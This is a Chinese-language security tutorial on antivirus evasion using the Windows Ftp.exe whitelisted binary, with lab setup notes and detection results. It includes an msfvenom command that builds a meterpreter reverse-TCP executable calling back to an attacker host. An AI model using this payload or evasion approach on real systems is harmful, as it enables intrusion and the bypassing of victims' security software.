声明：Tide安全团队原创文章，转载请声明出处！文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

文章打包下载及相关软件下载：https://github.com/TideSec/BypassAntiVirus，对免杀感兴趣的小伙伴可以微信关注"Tide安全团队"公众号，公众号回复“免杀”可下载所有资料。

几点说明：

1、表中标识 √ 说明相应杀毒软件未检测出病毒，也就是代表了Bypass。

2、为了更好的对比效果，大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。

3、由于本机测试时只是安装了360全家桶和火绒，所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01)，火绒版本5.0.34.16(2020.01.01)，360安全卫士12.0.0.2002(2020.01.01)。

4、其他杀软的检测指标是在virustotal.com（简称VT）上在线查杀，所以可能只是代表了静态查杀能力，数据仅供参考，不足以作为杀软查杀能力或免杀能力的判断指标。

5、完全不必要苛求一种免杀技术能bypass所有杀软，这样的技术肯定是有的，只是没被公开，一旦公开第二天就能被杀了，其实我们只要能bypass目标主机上的杀软就足够了。

6、由于白名单程序加载payload的免杀测试需要杀软的行为检测才合理，静态查杀payload或者查杀白名单程序都没有任何意义，所以这里对白名单程序的免杀效果不做评判。

Ftp.exe是Windows本身自带的一个程序，属于微软FTP工具，提供基本的FTP访问。

Ftp.exe所在路径已被系统添加PATH环境变量中。因此，Ftp.exe命令可识别。

Windows 2003 默认位置：

C:\Windows\System32\ftp.exeC:\Windows\SysWOW64\ftp.exe

Windows 7 默认位置：

C:\Windows\System32\ftp.exeC:\Windows\SysWOW64\ftp.exe

由于白名单加载payload的免杀测试需要结合杀软的行为检测才合理，查杀白名单文件都没有任何意义，payload文件的查杀率依赖于对payload的免杀处理，所以这里对白名单程序的免杀效果不做评判。

复现环境：

• 靶机win7
• 攻击机 kali 192.168.19.128

1、配置攻击机MSF；

2、使用msfvenom生成shellcode；

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.19.128 LPORT=4444 -f exe > shellcode.exe

3、靶机执行恶意shellcode；

由于shellcode.exe使用msfvenom生成的原生态shellcode，因此360、火绒均会报警。

由于shellcode的源码使用msfvenom生成，所以VT查杀相对较高，查杀率：48/61。